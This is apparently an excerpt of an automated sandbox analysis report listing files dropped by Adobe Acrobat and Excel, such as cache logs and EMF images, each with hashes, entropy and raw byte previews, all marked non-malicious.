                                          Preview:*...#................version.1..namespace-'I^.r................next-map-id.1.Snamespace-ae05de33_8cc0_4e34_9d2f_86511228726c-https://rna-v2-resource.acrobat.com/.0x.%8r................next-map-id.2.Snamespace-620912f0_b173_44a4_a2dd_2b6e03d5a667-https://rna-v2-resource.acrobat.com/.1.Oxho................next-map-id.3.Pnamespace-3f93b5cc_0b3a_45a1_a898_aa1d734e1e48-https://rna-resource.acrobat.com/.2.8.so................next-map-id.4.Pnamespace-9a1097df_23ac_40f2_a28a_c79f118db6c8-https://rna-resource.acrobat.com/.3z...r................next-map-id.5.Snamespace-7d7de5b5_9dd5_4b56_8ca5_38e8c6a17e9b-https://rna-v2-resource.acrobat.com/.4Z..mo................next-map-id.6.Pnamespace-30fc8b2c_fe8d_484e_8547_bfceb1dd86b3-https://rna-resource.acrobat.com/.5.'..^...............Pnamespace-3f93b5cc_0b3a_45a1_a898_aa1d734e1e48-https://rna-resource.acrobat.com/D..^...............Pnamespace-30fc8b2c_fe8d_484e_8547_bfceb1dd86b3-https://rna-resource.acrobat.com/&.^...............Pnamespace-9a1097df

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):324
                                          Entropy (8bit):5.156625907255664
                                          Encrypted:false
                                          SSDEEP:6:P51yq2Pccwi2nKuAl9OmbzNMxIFUt8IUqj1Zmw+IWmN1RkwOccwi2nKuAl9OmbzE:x4v0cwZHAa8jFUt8Bqj1/+lkD5dcwZHP
                                          MD5:F6A72D04211FE9FDE9AE4CBAE8207D2C
                                          SHA1:AC939A28E7B96491CC22F8A8E841885C25101205
                                          SHA-256:1F569BC04C5F6F2B4AE802BA08E565C54D5EC3997BF8FDA259DD3657829F5FC6
                                          SHA-512:C99DA47EE801DE998442CBD717D867F23CB538C62A908A55F64D135E2C08513A2BDD61E1FAB219CE07DAE8AE6BF0BD1950519A66D0DC539F863E1D49A92A9B5C
                                          Malicious:false
                                          Preview:2024/12/20-09:28:53.710 2070 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/20-09:28:53.712 2070 Recovering log #3.2024/12/20-09:28:53.714 2070 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):324
                                          Entropy (8bit):5.156625907255664
                                          Encrypted:false
                                          SSDEEP:6:P51yq2Pccwi2nKuAl9OmbzNMxIFUt8IUqj1Zmw+IWmN1RkwOccwi2nKuAl9OmbzE:x4v0cwZHAa8jFUt8Bqj1/+lkD5dcwZHP
                                          MD5:F6A72D04211FE9FDE9AE4CBAE8207D2C
                                          SHA1:AC939A28E7B96491CC22F8A8E841885C25101205
                                          SHA-256:1F569BC04C5F6F2B4AE802BA08E565C54D5EC3997BF8FDA259DD3657829F5FC6
                                          SHA-512:C99DA47EE801DE998442CBD717D867F23CB538C62A908A55F64D135E2C08513A2BDD61E1FAB219CE07DAE8AE6BF0BD1950519A66D0DC539F863E1D49A92A9B5C
                                          Malicious:false
                                          Preview:2024/12/20-09:28:53.710 2070 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/20-09:28:53.712 2070 Recovering log #3.2024/12/20-09:28:53.714 2070 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):131072
                                          Entropy (8bit):0.01330908196861665
                                          Encrypted:false
                                          SSDEEP:3:ImtV93zgg/oXlu3ElLv/llsU//tzDtSmlasJl9wWdHb5U/l:IiV98geu3Mr8UJcgIWdK/
                                          MD5:D01E4DF3703B53AE2AFDF91A7881AE11
                                          SHA1:EBFA8EED2B60A68055026D32DEB9B80F3A8CAB84
                                          SHA-256:9AEA2D4B77867EDEFAD0144B249D41213CE6A39D34C257FD4A7C3C8411966E5D
                                          SHA-512:0C755E3AFBACD18B796F5A664C62E4E90343E8A7728A8CFF668420E6241A879D4376358B2E6C1DC858C2087D8F3550F8CD442BE69493FF3174AD8BF55EC95FDF
                                          Malicious:false
                                          Preview:VLnk.....?.......V.D."..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):53109
                                          Entropy (8bit):1.8707965024639788
                                          Encrypted:false
                                          SSDEEP:384:Wo2LU0w+w/fQ12gnHwvAgIEnAoZp4ClacTAsX7c//jRlGm6:nw4gnHwvAP
                                          MD5:26CFA65BD4573F7D32E8FF2FAE807AFD
                                          SHA1:96CC271E568A6B8BE433045841C821C4E3EF8738
                                          SHA-256:E6042A83CD0A7ADDD618B3D7369092A6E60C179789369B4899F136D2D03D16FE
                                          SHA-512:34E69171900EC4D6E1D91076C63ED13C1F81764E744BA4F46611E8B99E03F2F0199D66CBBAA22012B65CFFCE7A41B0E20B828873F5FA79D60D04EC68570ED5B7
                                          Malicious:false
                                          Preview:Adobe Acrobat Reader (64-bit) 24.4.20272....?A12_AV2_AttachAudio_18px.............................................................................................KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.........KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.........KKK.KKK.................................................KKK.KKK.........KKK.KKK.................................................KKK.KKK.........KKK.KKK.................................................KKK.KKK.........KKK.KKK.................................................KKKpKKKp........KKK.KKK.............................................KKK KKK`............KKK.KKK.........................................KKK@KKK.KKK.KKK.........KKK.KKK.............................KKK KKK@KKKpKKK.KKK.KKK.KKK.........KKK.KKK.........................KKK0KKK.KKK.KKK.KKK.KKK`KKK.KKK.KKK.KKKPKKK.KKK.........................KKK.KKK.KKK.KKK.KKK ....KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK`........KKK.KKK.KKK@..

                                          C:\Users\user\AppData\Local\Microsoft\Office\Features\1-16FeatureCache.txt (copy)

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1584
                                          Entropy (8bit):2.6928361216532144
                                          Encrypted:false
                                          SSDEEP:24:YxIPuk+z7Fl3HyFOqYp2IyoeyjkFP5VQBMQRgYOCE+E7UXOKI5KazYvKISmtzGd2:YxAT+PFKUFM78BMQiYOSVIADK+GTzq
                                          MD5:CE32F70E720ADCBCA3832170077678F5
                                          SHA1:DBC905854C8C46BA08DFE3CB040A644C06E76F8D
                                          SHA-256:DC3B4A2D32EEB0B387AD67EE71194B61AB60818C633DF870DA89F5485D26FACE
                                          SHA-512:48BC3D3AF66EBA0CBA9941D3D8AA1E4360683DE7EDFB8489EACACA9052CF717136EA7CC6B9E58958B454D265C1A011865421BA818D461A15BFD17453DD14C2F0
                                          Malicious:false
                                          Preview:3.7.4.6.3.7.8.,.3.7.4.6.3.7.6.,.1.0.7.,.6.3.6.4.3.3.4.,.1.1.9.6.3.7.8.,.2.5.5.0.5.0.8.8.,.1.0.1.,.1.0.4.9.5.2.3.4.,.1.1.9.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.2.4.,.1.9.8.4.4.3.5.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.8.,.6.5.4.2.1.8.5.1.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.3.,.1.2.6.,.1.2.2.3.4.3.4.,.4.5.8.4.0.2.3.2.,.2.6.0.1.,.8.7.4.7.0.1.5.3.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.9.,.6.1.7.0.7.3.0.5.,.3.,.3.0.1.5.3.7.2.1.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.5.7.9.9.9.6.6.1.,.4.8.1.9.5.5.3.8.,.7.4.5.3.4.5.9.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.3.,.3.0.1.2.3.4.6.6.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.2.,.1.

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\17633467.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):884312
                                          Entropy (8bit):1.2944965349348616
                                          Encrypted:false
                                          SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                          MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                          SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                          SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                          SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                          Malicious:false
                                          Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\269A627E.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):2365700
                                          Entropy (8bit):2.5607149884575264
                                          Encrypted:false
                                          SSDEEP:6144:7q1ps74Ml+uTtCs8J0E4MxyuGOE68J0ZnW:R1ltcs00E1x8h600Y
                                          MD5:6F47F3BD91370F08CEFD1077F34789BC
                                          SHA1:8267FC90E7F63A51A1D5E93CA355940D7F01B55B
                                          SHA-256:978FEFF0E24B810EC235E772F1BF5E1F4FA6EA01718B685B7138F53372F82F82
                                          SHA-512:528BF5DA69AEE285CEA8CFCA89B58971520B09EF9071BA64F807562FDC9B32513581644FD51A916EC093EADE5EEEDD1FF5BC8985D3FB13E697F821447FC08846
                                          Malicious:false
                                          Preview:....l...............J................M.. EMF......$.V#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\672B05EB.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):1881088
                                          Entropy (8bit):1.7164791949730298
                                          Encrypted:false
                                          SSDEEP:3072:as74MwNuo/yiO9r5e+8J2dvRRvMdaux/ZiOE85e+8J2dvRcvMy2:as74MwNuKO9l8J0LuGOE68J0p
                                          MD5:3AB0303100D7D14C542E517CD4C32094
                                          SHA1:21A6C3668E422566CB5D7B7B6E5FDEB36E6C5117
                                          SHA-256:7F20811F43A5F97F6B6AE4D43A8EF75FB83A14E529D27F61AFB81A24A4DA5D6A
                                          SHA-512:378FBED6E32DC8F6D9FFE625AED495318479656F4CA392C1345FF14E7363956CC72867005A3B810FD0CBCECEFEE23EDB6A2101B2A1708C06D7876ECDA0153F04
                                          Malicious:false
                                          Preview:....l...............r............C...a.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\794F9615.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):2365352
                                          Entropy (8bit):2.577190770978393
                                          Encrypted:false
                                          SSDEEP:6144:es74M+hu4IXH8J0L4MX4uGOE68J0zvqfaiPH:l1+p4H00L1X6h600Q
                                          MD5:4EDEB3C4D225A58140995AB4B19115A2
                                          SHA1:459BF4A7B2C3FADA7F967E0B0B9AC54F25D813A3
                                          SHA-256:DCFC06483474D9E634B5E651E7A2A33A382D81E02E979682E48E23FC85D7E54C
                                          SHA-512:F5B23F49D7E278B0BF4C23006F3D82080979465DB556A58FC860A9AB359B77C5520FAD6A8B05E37E61517C66316586A0D33473666CFE7A70BE9C7831744F848C
                                          Malicious:false
                                          Preview:....l...........k...k...............@.. EMF......$..#..$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l.......'.......................%...........................................................L...d...........#...X...........$...C...!..............?...........?................................'.......................%...........(.......................L...d...#.......k...X...#.......I...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\83C95B96.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):34832
                                          Entropy (8bit):2.8884133288496865
                                          Encrypted:false
                                          SSDEEP:384:UCK6Royw05EBi9dI4Qv9jBNwpm0H76ATMFiD59nU:UbxBapFHmCOeXU
                                          MD5:A8CE562AAE2C9B81FB9BA866720D0FE8
                                          SHA1:61AC599AE270ECC900054777377BC0D339EA9ACB
                                          SHA-256:A79C856FFC5D9AA1821021123DBBFFD41249CF6CCE255A15CEB9E2CFB2730A31
                                          SHA-512:2042027B86A1CB09266D8D43CA5AE63AF5ADC7418D5580C53C1DC13E4256EFF2B9A7AFA3D547833E78D611B5AD085BD9F449BEC778522EF1825F79C7A22C8B1E
                                          Malicious:false
                                          Preview:....l...........B...............!?..3X.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\86E3FD12.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):34832
                                          Entropy (8bit):2.8884133288496865
                                          Encrypted:false
                                          SSDEEP:384:UCK6Royw05EBi9dI4Qv9jBNwpm0H76ATMFiD59nU:UbxBapFHmCOeXU
                                          MD5:A8CE562AAE2C9B81FB9BA866720D0FE8
                                          SHA1:61AC599AE270ECC900054777377BC0D339EA9ACB
                                          SHA-256:A79C856FFC5D9AA1821021123DBBFFD41249CF6CCE255A15CEB9E2CFB2730A31
                                          SHA-512:2042027B86A1CB09266D8D43CA5AE63AF5ADC7418D5580C53C1DC13E4256EFF2B9A7AFA3D547833E78D611B5AD085BD9F449BEC778522EF1825F79C7A22C8B1E
                                          Malicious:false
                                          Preview:....l...........B...............!?..3X.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8C207648.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):112400
                                          Entropy (8bit):3.611590161309178
                                          Encrypted:false
                                          SSDEEP:384:GgFFu9i+mE/ANOGpimKfV58CPDXGN/pMN89QmPPRsRDtSZxUHos:XFFFA5mMN89QFOeIs
                                          MD5:B4845D918E380C42E37B63C24AC1554A
                                          SHA1:950380B8A365F869777463634A63AB293B36F0BB
                                          SHA-256:1908C2F4E27CA37FFC7DB54BF0B86ED42F2CE80BADAEB5EAB0CF7450F8C13E66
                                          SHA-512:F2F387CBA66957BE493D98D8EDBF48E75B07BE0B01605DF9446E6DC058A59BDC8BCDF758EC98075AD3028F9FC67840A23C549061202E98786147C0A7D078D355
                                          Malicious:false
                                          Preview:....l...............X............/..ON.. EMF........\.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................\..."...........!...................................................\..."...........!...................................................\..."...........!...................................................\...R...p..................................0t....................................................................................@........$..8b..o/.8b...y...o/.........8b.........a%.h..y......8b.....$.y.N.o/p.y..yo/.....mo/..y...........b...y.......y.....,.y...o/.....8b...y.(.y..o/L.y...........................................................vp.y.

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9527D3D2.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):2365700
                                          Entropy (8bit):2.560690180526179
                                          Encrypted:false
                                          SSDEEP:6144:0q1ps74Ml+uTtCs8J0Q4MxyuGOE68J063+:u1ltcs00Q1x8h6005
                                          MD5:BA980499FDC1C50073C2A5797C74F090
                                          SHA1:FEB401DAA56514A5F3BEBB0880810C7CCE4518EA
                                          SHA-256:16D0FA0824A0A012D777C5274DCD72CBFDE6CB43A7C7050A379D909DCB0AD081
                                          SHA-512:FD217BC1CAC589F3108F110311BDC9B372F4E29D92496185D98658EBE90BBFB6B19DD5F2D2BC6A465C881B771A6A2687920C23C2348CFB028F576108E85ACF69
                                          Malicious:false
                                          Preview:....l...............J................M.. EMF......$.V#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\99CEB1A9.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):1881088
                                          Entropy (8bit):1.7164791949730298
                                          Encrypted:false
                                          SSDEEP:3072:as74MwNuo/yiO9r5e+8J2dvRRvMdaux/ZiOE85e+8J2dvRcvMy2:as74MwNuKO9l8J0LuGOE68J0p
                                          MD5:3AB0303100D7D14C542E517CD4C32094
                                          SHA1:21A6C3668E422566CB5D7B7B6E5FDEB36E6C5117
                                          SHA-256:7F20811F43A5F97F6B6AE4D43A8EF75FB83A14E529D27F61AFB81A24A4DA5D6A
                                          SHA-512:378FBED6E32DC8F6D9FFE625AED495318479656F4CA392C1345FF14E7363956CC72867005A3B810FD0CBCECEFEE23EDB6A2101B2A1708C06D7876ECDA0153F04
                                          Malicious:false
                                          Preview:....l...............r............C...a.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CEF4020D.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):884312
                                          Entropy (8bit):1.2944965349348616
                                          Encrypted:false
                                          SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                          MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                          SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                          SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                          SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                          Malicious:false
                                          Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D4F9B33C.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):45556
                                          Entropy (8bit):3.2389256176191146
                                          Encrypted:false
                                          SSDEEP:384:IAB0utfMq2/aXmD7YsZgyXrHUpNDEk1Y6iJV6smkgjYx16U+z0pdkblo3OhG+U:7Uq2/JjZgyrH+Xs6UaAdelo+C
                                          MD5:65103012FD0D90B64E04605779EBA439
                                          SHA1:E28FEF0979669A7CA78C0B17E21B551E361EF85E
                                          SHA-256:40DE1766B2589303FF3F0C27D6CA82A28EE5A6576B7F38BEEBA017E777881CCF
                                          SHA-512:E02F05C6C0AE825A2074AC3EF1C48BE527A239CB898D27EC8F6B4B6543B95C9FD0F7F1249C08EAC52AC3F7C1036E2F9D5EE73F7B3465C17AFE7E5390845F040D
                                          Malicious:false
                                          Preview:................g...g...........O-..O-.. EMF................:...l........'..}3.......................K...A..I.n.k.s.c.a.p.e. .0...9.2...3. .(.2.4.0.5.5.4.6.,. .2.0.1.8.-.0.3.-.1.1.)...B.o.t.t.o.m. .c.o.r.n.e.r...e.m.f...................$...$......?...........?............F...,... ...Screen=10205x13181px, 216x279mm.F...4...%...Drawing=438.1x436.0px, 115.9x115.4mm................................................................'...............0.......%...........;...............Z...+.......4.......................,......./.......`...u.......4.......................~...W.......P.......P.......4...........................P...B.......B...........4.......................B...#.......J.......J.......4...........................J...s...D...Z...+...=...........................4...............................{...................4...........................z.......i.......i.......4.......................G...i...t.......G...........4.......................%...;.......K...........=..............."...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DD5D6A9F.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):2365700
                                          Entropy (8bit):2.560690180526179
                                          Encrypted:false
                                          SSDEEP:6144:0q1ps74Ml+uTtCs8J0Q4MxyuGOE68J063+:u1ltcs00Q1x8h6005
                                          MD5:BA980499FDC1C50073C2A5797C74F090
                                          SHA1:FEB401DAA56514A5F3BEBB0880810C7CCE4518EA
                                          SHA-256:16D0FA0824A0A012D777C5274DCD72CBFDE6CB43A7C7050A379D909DCB0AD081
                                          SHA-512:FD217BC1CAC589F3108F110311BDC9B372F4E29D92496185D98658EBE90BBFB6B19DD5F2D2BC6A465C881B771A6A2687920C23C2348CFB028F576108E85ACF69
                                          Malicious:false
                                          Preview:....l...............J................M.. EMF......$.V#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EE7A48AA.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):2365700
                                          Entropy (8bit):2.560690180526179
                                          Encrypted:false
                                          SSDEEP:6144:0q1ps74Ml+uTtCs8J0Q4MxyuGOE68J063+:u1ltcs00Q1x8h6005
                                          MD5:BA980499FDC1C50073C2A5797C74F090
                                          SHA1:FEB401DAA56514A5F3BEBB0880810C7CCE4518EA
                                          SHA-256:16D0FA0824A0A012D777C5274DCD72CBFDE6CB43A7C7050A379D909DCB0AD081
                                          SHA-512:FD217BC1CAC589F3108F110311BDC9B372F4E29D92496185D98658EBE90BBFB6B19DD5F2D2BC6A465C881B771A6A2687920C23C2348CFB028F576108E85ACF69
                                          Malicious:false
                                          Preview:....l...............J................M.. EMF......$.V#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F57DEEF0.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):112400
                                          Entropy (8bit):3.611590161309178
                                          Encrypted:false
                                          SSDEEP:384:GgFFu9i+mE/ANOGpimKfV58CPDXGN/pMN89QmPPRsRDtSZxUHos:XFFFA5mMN89QFOeIs
                                          MD5:B4845D918E380C42E37B63C24AC1554A
                                          SHA1:950380B8A365F869777463634A63AB293B36F0BB
                                          SHA-256:1908C2F4E27CA37FFC7DB54BF0B86ED42F2CE80BADAEB5EAB0CF7450F8C13E66
                                          SHA-512:F2F387CBA66957BE493D98D8EDBF48E75B07BE0B01605DF9446E6DC058A59BDC8BCDF758EC98075AD3028F9FC67840A23C549061202E98786147C0A7D078D355
                                          Malicious:false
                                          Preview:....l...............X............/..ON.. EMF........\.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................\..."...........!...................................................\..."...........!...................................................\..."...........!...................................................\...R...p..................................0t....................................................................................@........$..8b..o/.8b...y...o/.........8b.........a%.h..y......8b.....$.y.N.o/p.y..yo/.....mo/..y...........b...y.......y.....,.y...o/.....8b...y.(.y..o/L.y...........................................................vp.y.

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FA08C231.emf

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):2365460
                                          Entropy (8bit):2.5604966112914647
                                          Encrypted:false
